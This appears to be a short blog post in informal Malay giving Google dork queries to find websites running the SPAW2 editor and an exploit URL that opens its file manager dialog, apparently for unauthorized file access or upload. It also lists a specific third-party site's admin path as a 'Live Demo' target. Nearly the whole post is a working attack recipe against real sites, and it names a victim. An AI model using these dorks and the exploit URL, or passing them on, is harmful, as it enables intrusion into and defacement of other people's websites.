Bersama dengan NoEntry Phc,
Google Dork:- Inurl:"Spaw2/dialogs/" or Inurl:"spaw2/uploads/files" or Index of:/Spaw2/uploads/files" dan fikir yg lain.
Awak sume akn dpt result seperti ini---> "Index of/ spaw2/dialogs/" or : site.com/abc/spaw2/uploads/files/abc/abc.pdf
Skang mari kita gantikan URL dengan exploit kita:
Spaw2/Uploads/abc/abc digantikan dengan---> spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Live Demo:-
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
No comments:
Post a Comment